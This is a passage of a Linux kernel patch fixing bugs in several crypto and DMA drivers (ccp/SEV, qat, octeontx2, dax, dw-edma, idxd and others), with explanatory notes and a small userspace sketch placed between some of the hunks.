+--- a/drivers/crypto/amcc/crypto4xx_core.c
++++ b/drivers/crypto/amcc/crypto4xx_core.c
+@@ -522,7 +522,6 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ {
+ 	struct skcipher_request *req;
+ 	struct scatterlist *dst;
+-	dma_addr_t addr;
+ 
+ 	req = skcipher_request_cast(pd_uinfo->async_req);
+ 
+@@ -531,8 +530,8 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ 					  req->cryptlen, req->dst);
+ 	} else {
+ 		dst = pd_uinfo->dest_va;
+-		addr = dma_map_page(dev->core_dev->device, sg_page(dst),
+-				    dst->offset, dst->length, DMA_FROM_DEVICE);
++		dma_unmap_page(dev->core_dev->device, pd->dest, dst->length,
++			       DMA_FROM_DEVICE);
+ 	}
+ 
+ 	if (pd_uinfo->sa_va->sa_command_0.bf.save_iv == SA_SAVE_IV) {
+@@ -557,10 +556,9 @@ static void crypto4xx_ahash_done(struct crypto4xx_device *dev,
+ 	struct ahash_request *ahash_req;
+ 
+ 	ahash_req = ahash_request_cast(pd_uinfo->async_req);
+-	ctx  = crypto_tfm_ctx(ahash_req->base.tfm);
++	ctx = crypto_ahash_ctx(crypto_ahash_reqtfm(ahash_req));
+ 
+-	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo,
+-				     crypto_tfm_ctx(ahash_req->base.tfm));
++	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo, ctx);
+ 	crypto4xx_ret_sg_desc(dev, pd_uinfo);
+ 
+ 	if (pd_uinfo->state & PD_ENTRY_BUSY)
+diff --git a/drivers/crypto/ccp/ccp-dmaengine.c b/drivers/crypto/ccp/ccp-dmaengine.c
+index 9f753cb4f5f18..b386a7063818b 100644
+--- a/drivers/crypto/ccp/ccp-dmaengine.c
++++ b/drivers/crypto/ccp/ccp-dmaengine.c
+@@ -642,14 +642,26 @@ static void ccp_dma_release(struct ccp_device *ccp)
+ 		chan = ccp->ccp_dma_chan + i;
+ 		dma_chan = &chan->dma_chan;
+ 
+-		if (dma_chan->client_count)
+-			dma_release_channel(dma_chan);
+-
+ 		tasklet_kill(&chan->cleanup_tasklet);
+ 		list_del_rcu(&dma_chan->device_node);
+ 	}
+ }
+ 
++static void ccp_dma_release_channels(struct ccp_device *ccp)
++{
++	struct ccp_dma_chan *chan;
++	struct dma_chan *dma_chan;
++	unsigned int i;
++
++	for (i = 0; i < ccp->cmd_q_count; i++) {
++		chan = ccp->ccp_dma_chan + i;
++		dma_chan = &chan->dma_chan;
++
++		if (dma_chan->client_count)
++			dma_release_channel(dma_chan);
++	}
++}
++
+ int ccp_dmaengine_register(struct ccp_device *ccp)
+ {
+ 	struct ccp_dma_chan *chan;
+@@ -770,8 +782,9 @@ void ccp_dmaengine_unregister(struct ccp_device *ccp)
+ 	if (!dmaengine)
+ 		return;
+ 
+-	ccp_dma_release(ccp);
++	ccp_dma_release_channels(ccp);
+ 	dma_async_device_unregister(dma_dev);
++	ccp_dma_release(ccp);
+ 
+ 	kmem_cache_destroy(ccp->dma_desc_cache);
+ 	kmem_cache_destroy(ccp->dma_cmd_cache);
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 06fc7156c04f3..3e583f0324874 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -26,6 +26,7 @@
+ #include <linux/fs_struct.h>
+ 
+ #include <asm/smp.h>
++#include <asm/cacheflush.h>
+ 
+ #include "psp-dev.h"
+ #include "sev-dev.h"
+@@ -881,7 +882,14 @@ static int sev_ioctl_do_get_id2(struct sev_issue_cmd *argp)
+ 	input_address = (void __user *)input.address;
+ 
+ 	if (input.address && input.length) {
+-		id_blob = kzalloc(input.length, GFP_KERNEL);
++		/*
++		 * The length of the ID shouldn't be assumed by software since
++		 * it may change in the future.  The allocation size is limited
++		 * to 1 << (PAGE_SHIFT + MAX_ORDER - 1) by the page allocator.
++		 * If the allocation fails, simply return ENOMEM rather than
++		 * warning in the kernel log.
++		 */
++		id_blob = kzalloc(input.length, GFP_KERNEL | __GFP_NOWARN);
+ 		if (!id_blob)
+ 			return -ENOMEM;
+ 
+@@ -1327,7 +1335,10 @@ void sev_pci_init(void)
+ 
+ 	/* Obtain the TMR memory area for SEV-ES use */
+ 	sev_es_tmr = sev_fw_alloc(SEV_ES_TMR_SIZE);
+-	if (!sev_es_tmr)
++	if (sev_es_tmr)
++		/* Must flush the cache before giving it to the firmware */
++		clflush_cache_range(sev_es_tmr, SEV_ES_TMR_SIZE);
++	else
+ 		dev_warn(sev->dev,
+ 			 "SEV: TMR allocation failed, SEV-ES support unavailable\n");
+ 
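
The GET_ID2 hunk treats the user-supplied length as untrusted and adds __GFP_NOWARN, so an oversized request fails with a plain -ENOMEM instead of triggering a page-allocator warning; the kernel relies on the allocator's implicit size ceiling. Userspace has no such ceiling, so this sketch adds an explicit cap, which is an assumption of the example, not something the patch does:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_ID_BLOB (1u << 20)	/* hypothetical cap; the kernel leans on the page allocator */

static void *alloc_id_blob(size_t user_len, int *err)
{
	void *blob;

	if (user_len == 0 || user_len > MAX_ID_BLOB) {
		*err = -EINVAL;		/* reject obviously bogus sizes up front */
		return NULL;
	}
	blob = calloc(1, user_len);
	if (!blob)
		*err = -ENOMEM;		/* fail quietly, like __GFP_NOWARN */
	return blob;
}

int main(void)
{
	int err = 0;
	void *blob = alloc_id_blob(512, &err);

	printf("alloc 512   -> %s\n", blob ? "ok" : "failed");
	free(blob);

	if (!alloc_id_blob((size_t)1 << 30, &err))
		printf("alloc 1 GiB -> err %d\n", err);
	return 0;
}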
+diff --git a/drivers/crypto/hisilicon/sgl.c b/drivers/crypto/hisilicon/sgl.c
+index 2b6f2281cfd6c..0974b00414050 100644
+--- a/drivers/crypto/hisilicon/sgl.c
++++ b/drivers/crypto/hisilicon/sgl.c
+@@ -124,9 +124,8 @@ err_free_mem:
+ 	for (j = 0; j < i; j++) {
+ 		dma_free_coherent(dev, block_size, block[j].sgl,
+ 				  block[j].sgl_dma);
+-		memset(block + j, 0, sizeof(*block));
+ 	}
+-	kfree(pool);
++	kfree_sensitive(pool);
+ 	return ERR_PTR(-ENOMEM);
+ }
+ EXPORT_SYMBOL_GPL(hisi_acc_create_sgl_pool);
+diff --git a/drivers/crypto/marvell/octeontx2/Makefile b/drivers/crypto/marvell/octeontx2/Makefile
+index 965297e969546..f0f2942c1d278 100644
+--- a/drivers/crypto/marvell/octeontx2/Makefile
++++ b/drivers/crypto/marvell/octeontx2/Makefile
+@@ -1,11 +1,10 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptpf.o rvu_cptvf.o
++obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptcommon.o rvu_cptpf.o rvu_cptvf.o
+ 
++rvu_cptcommon-objs := cn10k_cpt.o otx2_cptlf.o otx2_cpt_mbox_common.o
+ rvu_cptpf-objs := otx2_cptpf_main.o otx2_cptpf_mbox.o \
+-		  otx2_cpt_mbox_common.o otx2_cptpf_ucode.o otx2_cptlf.o \
+-		  cn10k_cpt.o otx2_cpt_devlink.o
+-rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o otx2_cptlf.o \
+-		  otx2_cpt_mbox_common.o otx2_cptvf_reqmgr.o \
+-		  otx2_cptvf_algs.o cn10k_cpt.o
++		  otx2_cptpf_ucode.o otx2_cpt_devlink.o
++rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o \
++		  otx2_cptvf_reqmgr.o otx2_cptvf_algs.o
+ 
+ ccflags-y += -I$(srctree)/drivers/net/ethernet/marvell/octeontx2/af
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+index 1499ef75b5c22..93d22b3289919 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+@@ -7,6 +7,9 @@
+ #include "otx2_cptlf.h"
+ #include "cn10k_cpt.h"
+ 
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf);
++
+ static struct cpt_hw_ops otx2_hw_ops = {
+ 	.send_cmd = otx2_cpt_send_cmd,
+ 	.cpt_get_compcode = otx2_cpt_get_compcode,
+@@ -19,8 +22,8 @@ static struct cpt_hw_ops cn10k_hw_ops = {
+ 	.cpt_get_uc_compcode = cn10k_cpt_get_uc_compcode,
+ };
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf)
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf)
+ {
+ 	void __iomem *lmtline = lf->lmtline;
+ 	u64 val = (lf->slot & 0x7FF);
+@@ -68,6 +71,7 @@ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptpf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ {
+@@ -91,3 +95,4 @@ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptvf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+index c091392b47e0f..aaefc7e38e060 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+@@ -28,8 +28,6 @@ static inline u8 otx2_cpt_get_uc_compcode(union otx2_cpt_res_s *result)
+ 	return ((struct cn9k_cpt_res_s *)result)->uc_compcode;
+ }
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf);
+ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf);
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+index 5012b7e669f07..6019066a6451a 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+@@ -145,8 +145,6 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox,
+ 				  struct pci_dev *pdev);
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr);
+ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			      u64 reg, u64 val, int blkaddr);
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+index a317319696eff..115997475beb3 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+@@ -19,6 +19,7 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+@@ -36,14 +37,17 @@ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_ready_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_af_reg_requests, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr)
++static int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox,
++				    struct pci_dev *pdev, u64 reg,
++				    u64 *val, int blkaddr)
+ {
+ 	struct cpt_rd_wr_reg_msg *reg_msg;
+ 
+@@ -91,6 +95,7 @@ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_add_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			 u64 reg, u64 *val, int blkaddr)
+@@ -103,6 +108,7 @@ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_read_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			  u64 reg, u64 val, int blkaddr)
+@@ -115,6 +121,7 @@ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_attach_rscrs_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -170,6 +177,7 @@ int otx2_cpt_detach_rsrcs_msg(struct otx2_cptlfs_info *lfs)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_detach_rsrcs_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -202,6 +210,7 @@ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_msix_offset_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ {
+@@ -216,3 +225,4 @@ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ 
+ 	return otx2_mbox_check_rsp_msgs(mbox, 0);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_sync_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index c8350fcd60fab..71e5f79431afa 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -274,6 +274,8 @@ void otx2_cptlf_unregister_interrupts(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	cptlf_disable_intrs(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_unregister_interrupts,
++		     CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ static int cptlf_do_register_interrrupts(struct otx2_cptlfs_info *lfs,
+ 					 int lf_num, int irq_offset,
+@@ -321,6 +323,7 @@ free_irq:
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_register_interrupts, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -334,6 +337,7 @@ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ 		free_cpumask_var(lfs->lf[slot].affinity_mask);
+ 	}
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_free_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_set_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -366,6 +370,7 @@ free_affinity_mask:
+ 	otx2_cptlf_free_irqs_affinity(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_set_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 		    int lfs_num)
+@@ -422,6 +427,7 @@ clear_lfs_num:
+ 	lfs->lfs_num = 0;
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+@@ -431,3 +437,8 @@ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
++
++MODULE_AUTHOR("Marvell");
++MODULE_DESCRIPTION("Marvell RVU CPT Common module");
++MODULE_LICENSE("GPL");
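
The Makefile and EXPORT_SYMBOL_NS_GPL() changes above carve the code shared by the PF and VF drivers into a third module, rvu_cptcommon, whose exports live in the CRYPTO_DEV_OCTEONTX2_CPT symbol namespace. Namespaced exports are invisible to modules that do not opt in, which keeps the shared helpers out of the global symbol space. The pattern, with an illustrative namespace name:

    /* Provider module ('FOO' is a made-up namespace for illustration): */
    EXPORT_SYMBOL_NS_GPL(foo_do_work, FOO);

    /* Each consumer must import the namespace, or the module fails to
     * load with a missing-namespace-import error (modpost also warns
     * at build time):
     */
    MODULE_IMPORT_NS(FOO);
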
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+index a402ccfac5577..ddf6e913c1c45 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+@@ -831,6 +831,8 @@ static struct pci_driver otx2_cpt_pci_driver = {
+ 
+ module_pci_driver(otx2_cpt_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION(OTX2_CPT_DRV_STRING);
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 3411e664cf50c..392e9fee05e81 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -429,6 +429,8 @@ static struct pci_driver otx2_cptvf_pci_driver = {
+ 
+ module_pci_driver(otx2_cptvf_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION("Marvell RVU CPT Virtual Function Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index cad9c58caab13..f56ee4cc5ae8b 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -434,8 +434,8 @@ static void qat_alg_skcipher_init_com(struct qat_alg_skcipher_ctx *ctx,
+ 	} else if (aes_v2_capable && mode == ICP_QAT_HW_CIPHER_CTR_MODE) {
+ 		ICP_QAT_FW_LA_SLICE_TYPE_SET(header->serv_specif_flags,
+ 					     ICP_QAT_FW_LA_USE_UCS_SLICE_TYPE);
+-		keylen = round_up(keylen, 16);
+ 		memcpy(cd->ucs_aes.key, key, keylen);
++		keylen = round_up(keylen, 16);
+ 	} else {
+ 		memcpy(cd->aes.key, key, keylen);
+ 	}
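
The qat_algs.c hunk is an out-of-bounds read fix: rounding keylen up to 16 before the memcpy() made the copy read past the end of the caller's key buffer whenever the key length was not already a multiple of 16. Copying first and rounding afterwards sizes the UCS hardware field without over-reading:

    memcpy(cd->ucs_aes.key, key, keylen);  /* copy only what the caller provided */
    keylen = round_up(keylen, 16);         /* pad the length used for the HW slice */
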
+diff --git a/drivers/cxl/pmem.c b/drivers/cxl/pmem.c
+index 4c627d67281a1..1fca9848883d8 100644
+--- a/drivers/cxl/pmem.c
++++ b/drivers/cxl/pmem.c
+@@ -75,6 +75,7 @@ static int cxl_nvdimm_probe(struct device *dev)
+ 		goto out;
+ 
+ 	set_bit(NDD_LABELING, &flags);
++	set_bit(NDD_REGISTER_SYNC, &flags);
+ 	set_bit(ND_CMD_GET_CONFIG_SIZE, &cmd_mask);
+ 	set_bit(ND_CMD_GET_CONFIG_DATA, &cmd_mask);
+ 	set_bit(ND_CMD_SET_CONFIG_DATA, &cmd_mask);
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index 1dad813ee4a69..c64e7076537cb 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -427,8 +427,8 @@ static void unregister_dev_dax(void *dev)
+ 	dev_dbg(dev, "%s\n", __func__);
+ 
+ 	kill_dev_dax(dev_dax);
+-	free_dev_dax_ranges(dev_dax);
+ 	device_del(dev);
++	free_dev_dax_ranges(dev_dax);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4852a2dbdb278..4aa758a2b3d1b 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -146,7 +146,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 		if (rc) {
+ 			dev_warn(dev, "mapping%d: %#llx-%#llx memory add failed\n",
+ 					i, range.start, range.end);
+-			release_resource(res);
++			remove_resource(res);
+ 			kfree(res);
+ 			data->res[i] = NULL;
+ 			if (mapped)
+@@ -195,7 +195,7 @@ static void dev_dax_kmem_remove(struct dev_dax *dev_dax)
+ 
+ 		rc = remove_memory(range.start, range_len(&range));
+ 		if (rc == 0) {
+-			release_resource(data->res[i]);
++			remove_resource(data->res[i]);
+ 			kfree(data->res[i]);
+ 			data->res[i] = NULL;
+ 			success++;
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index 7524b62a8870a..b64ae02c26f8c 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -244,7 +244,7 @@ config FSL_RAID
+ 
+ config HISI_DMA
+ 	tristate "HiSilicon DMA Engine support"
+-	depends on ARM64 || COMPILE_TEST
++	depends on ARCH_HISI || COMPILE_TEST
+ 	depends on PCI_MSI
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index bf85aa0979ecb..152c5d98524d7 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -325,8 +325,6 @@ dma_chan_tx_status(struct dma_chan *dchan, dma_cookie_t cookie,
+ 		len = vd_to_axi_desc(vdesc)->hw_desc[0].len;
+ 		completed_length = completed_blocks * len;
+ 		bytes = length - completed_length;
+-	} else {
+-		bytes = vd_to_axi_desc(vdesc)->length;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index c54b24ff5206a..52bdf04aff511 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -455,6 +455,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			} else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->dar = dst_addr;
+ 			}
+ 		} else {
+ 			burst->dar = dst_addr;
+@@ -470,6 +472,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			}  else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->sar = src_addr;
+ 			}
+ 		}
+ 
+diff --git a/drivers/dma/dw-edma/dw-edma-v0-core.c b/drivers/dma/dw-edma/dw-edma-v0-core.c
+index 77e6cfe52e0a3..a3816ba632851 100644
+--- a/drivers/dma/dw-edma/dw-edma-v0-core.c
++++ b/drivers/dma/dw-edma/dw-edma-v0-core.c
+@@ -192,7 +192,7 @@ static inline void writeq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ static inline u64 readq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ 			   const void __iomem *addr)
+ {
+-	u32 value;
++	u64 value;
+ 
+ 	if (dw->chip->mf == EDMA_MF_EDMA_LEGACY) {
+ 		u32 viewport_sel;
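
In readq_ch() above, the legacy-viewport path assembles a 64-bit register value from two 32-bit accesses, and staging the result in a u32 silently discarded the upper half; widening the local to u64 preserves it. The hazard in isolation (illustrative, not the driver's exact code):

    u32 lo = readl(addr);
    u32 hi = readl(addr + 4);
    u64 value = ((u64)hi << 32) | lo;   /* a u32 'value' here would drop 'hi' */
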
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 6d8ff664fdfb2..3b4ad7739f9ee 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -702,7 +702,7 @@ static void idxd_groups_clear_state(struct idxd_device *idxd)
+ 		group->use_rdbuf_limit = false;
+ 		group->rdbufs_allowed = 0;
+ 		group->rdbufs_reserved = 0;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index 09cbf0c179ba9..e0f49545d89ff 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -296,7 +296,7 @@ static int idxd_setup_groups(struct idxd_device *idxd)
+ 		}
+ 
+ 		idxd->groups[i] = group;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 3229dfc786507..18cd8151dee02 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -387,7 +387,7 @@ static ssize_t group_traffic_class_a_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+@@ -429,7 +429,7 @@ static ssize_t group_traffic_class_b_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index cc22d162ce250..1aa65e5de0f3a 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -254,7 +254,7 @@ static void pt_issue_pending(struct dma_chan *dma_chan)
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ 
+ 	/* If there was nothing active, start processing */
+-	if (engine_is_idle)
++	if (engine_is_idle && desc)
+ 		pt_cmd_callback(desc, 0);
+ }
+ 
+diff --git a/drivers/dma/sf-pdma/sf-pdma.c b/drivers/dma/sf-pdma/sf-pdma.c
+index 6b524eb6bcf3a..e578ad5569494 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.c
++++ b/drivers/dma/sf-pdma/sf-pdma.c
+@@ -96,7 +96,6 @@ sf_pdma_prep_dma_memcpy(struct dma_chan *dchan,	dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
